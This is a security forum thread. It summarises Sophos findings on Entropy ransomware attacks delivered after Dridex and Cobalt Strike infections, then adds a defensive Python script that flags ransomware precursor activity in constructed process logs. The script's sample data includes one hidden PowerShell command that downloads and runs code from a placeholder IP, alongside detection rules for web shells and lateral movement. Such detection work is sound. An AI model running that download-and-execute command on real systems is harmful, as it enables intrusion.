Dridex bots deliver Entropy ransomware in recent attacks

Kongo

A pair of incidents at different organizations in which attackers deployed a ransomware called Entropy were preceded by infections with tools that provided the attackers with remote access — Cobalt Strike beacons and Dridex malware — on some of the targets’ computers, before the attackers launched the ransomware.
Sophos analysts hadn’t encountered Entropy prior to these incidents. Notably, there were significant differences in the methodologies employed by the attackers between both cases: How the attackers gained a foothold in the targets; the time the attackers spent inside the target’s network; and the malware that was used to prepare the final phase of the attack were substantially different.
Some aspects of the attacks were consistent: In both cases, the attackers relied heavily on Cobalt Strike as a means to infect more machines, meeting variable levels of success depending on whether the target had protection installed on a given machine. The attackers also performed redundant exfiltration of private data to more than one cloud storage provider. During a forensic analysis, we encountered multiple instances of Dridex, the well-known, general-purpose malware that its operators can use to distribute other malware.

Source: Dridex bots deliver Entropy ransomware in recent attacks
 

Andy Ful

From the Sophos article:
A pair of incidents at different organizations in which attackers deployed a ransomware called Entropy were preceded by infections with tools that provided the attackers with remote access — Cobalt Strike beacons and Dridex malware — on some of the targets’ computers, before the attackers launched the ransomware.
In the first incident, the attackers exploited the ProxyShell vulnerability on the network belonging to a North American media organization, to install a remote shell on the target’s Exchange server, and leveraged that to spread Cobalt Strike beacons to other computers. Over a four-month period, the attackers took their time probing the organization, and stealing data, before launching the attack at the beginning of December. Subsequent post-attack forensics revealed several Dridex payloads on some of the infected machines.
Analysis of the second Entropy attack — this time on a regional government organization — revealed that a malicious email attachment had infected a user’s computer with the Dridex botnet Trojan, and that the attackers used Dridex to deliver additional malware (as well as the commercial remote access utility ScreenConnect) and move laterally within the target’s network.
The threat actors had compiled custom versions of the Entropy ransomware DLL for each targeted organization. The malware contains hardcoded references to the targeted organization in its code, including text and images later used in an HTML ransom note dropped on infected machines.

These attacks can show the difference between widespread ransomware attacks (dangerous for home users) and highly targeted attacks on organizations.
  1. In organizations, ransomware is usually applied as the final payload via lateral movement (the network is already compromised by other malware). The ransomware can often be prevented when proper incident analysis is performed by administrators.
  2. The malware is often prepared/adjusted for the target.
  3. The initial attack vectors can sometimes be similar to those used in widespread attacks (emails, etc.) and sometimes not (stolen credentials, server exploits, IoT exploits, etc.).
  4. The attack surface in organizations is much larger compared to the home environment.
 
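Both posts above describe the same pattern: a long, visible precursor phase (web shell on the Exchange server, Dridex from an email attachment, ScreenConnect, lateral movement) before the ransomware DLL is finally run. The script below is an added example written for this thread, not code from Sophos or from either poster. It runs a few generic precursor heuristics over constructed process-creation events (the hostnames, paths, timestamps and IP are made up, and the rules are my own assumptions that mirror the two chains quoted above: IIS worker spawning a shell, Office spawning a script host, rundll32 loading a DLL from a user-writable path, a ScreenConnect client appearing, a remote-service shell). It then groups hits per host, orders hosts for triage and measures how many days the precursor activity was visible, which is the window in which, as point 1 says, an administrator doing incident analysis can still stop the encryption. It does not attempt to detect Cobalt Strike beacons themselves.

```python
"""
Correlate ransomware precursor activity from process-creation events.

Added example for this thread, not code from Sophos or the forum posters.
SAMPLE_EVENTS is constructed data and the rules in classify() are generic
heuristics chosen to mirror the two attack chains described in the post.
"""
from collections import defaultdict
from datetime import datetime
import ntpath

# Constructed sample events: (timestamp, host, parent image, image, command line).
SAMPLE_EVENTS = [
    # Exchange server: IIS worker process spawning shells (web shell activity)
    ("2021-08-10T03:12:44", "EXCH01", r"C:\Windows\System32\inetsrv\w3wp.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ("2021-08-10T03:13:02", "EXCH01", r"C:\Windows\System32\inetsrv\w3wp.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    # Workstation: Word spawning a script host (malicious attachment)
    ("2021-11-02T09:41:10", "WS-042", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\jdoe\AppData\Local\Temp\invoice.js"),
    # Same workstation: DLL executed from a user-writable path
    ("2021-11-02T09:41:35", "WS-042", r"C:\Windows\System32\wscript.exe",
     r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\ldr.dll,DllRegisterServer"),
    # Same workstation: commercial remote-access tool installed
    ("2021-11-02T10:05:51", "WS-042", r"C:\Windows\System32\msiexec.exe",
     r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "ScreenConnect.ClientService.exe"),
    # File server: shell started by a remote service (lateral movement)
    ("2021-11-03T22:17:09", "FS01", r"C:\Windows\PSEXESVC.exe",
     r"C:\Windows\System32\cmd.exe", 'cmd.exe /c net group "domain admins" /domain'),
    # Benign noise that must not fire
    ("2021-11-03T08:00:00", "WS-042", r"C:\Windows\explorer.exe",
     r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE report.docx"),
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(parent, image, cmdline):
    """Return the precursor stage an event matches, or None (assumed heuristics)."""
    p, i, c = base(parent), base(image), cmdline.lower()
    if p == "w3wp.exe" and i in SHELLS:
        return "webshell_spawn"            # IIS worker running a shell
    if p in OFFICE and i in SHELLS:
        return "office_spawned_script"     # attachment spawning a script host
    if i == "rundll32.exe" and any(m in c for m in USER_WRITABLE):
        return "rundll32_user_path"        # DLL loaded from a user-writable directory
    if i.startswith("screenconnect."):
        return "remote_access_tool"        # commercial remote-access client appears
    if p in {"psexesvc.exe", "wmiprvse.exe"} and i in SHELLS:
        return "remote_service_exec"       # shell launched through a remote service
    return None


def correlate(events):
    """Group matched stages per host: host -> {stage: first-seen datetime}."""
    hits = defaultdict(dict)
    for ts, host, parent, image, cmdline in events:
        stage = classify(parent, image, cmdline)
        if stage is None:
            continue
        when = datetime.fromisoformat(ts)
        if stage not in hits[host] or when < hits[host][stage]:
            hits[host][stage] = when
    return dict(hits)


def dwell_days(events):
    """Days between the earliest and latest precursor hit across all hosts:
    the window in which analysis could still have stopped the final payload."""
    times = [datetime.fromisoformat(ts) for ts, _h, p, i, c in events if classify(p, i, c)]
    if not times:
        return 0.0
    return (max(times) - min(times)).total_seconds() / 86400


def triage_order(hits):
    """Hosts sorted by number of distinct stages, then by earliest hit:
    the order in which a responder should isolate and image them."""
    return sorted(hits, key=lambda h: (-len(hits[h]), min(hits[h].values())))


if __name__ == "__main__":
    found = correlate(SAMPLE_EVENTS)
    for host in triage_order(found):
        for stage, when in sorted(found[host].items(), key=lambda kv: kv[1]):
            print(f"{when:%Y-%m-%d %H:%M} {host:8} {stage}")
    print(f"precursor activity spanned {dwell_days(SAMPLE_EVENTS):.1f} days")
```

In real use the events would come from Sysmon event ID 1 or an EDR's process telemetry rather than a list, and the rules would be tuned to the environment (an organization that legitimately deploys ScreenConnect would whitelist its installer's signer rather than drop the rule), but the structure stays the same: each stage alone is weak evidence, several stages on one host within days of each other is what should trigger isolation before the ransomware DLL ever runs.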
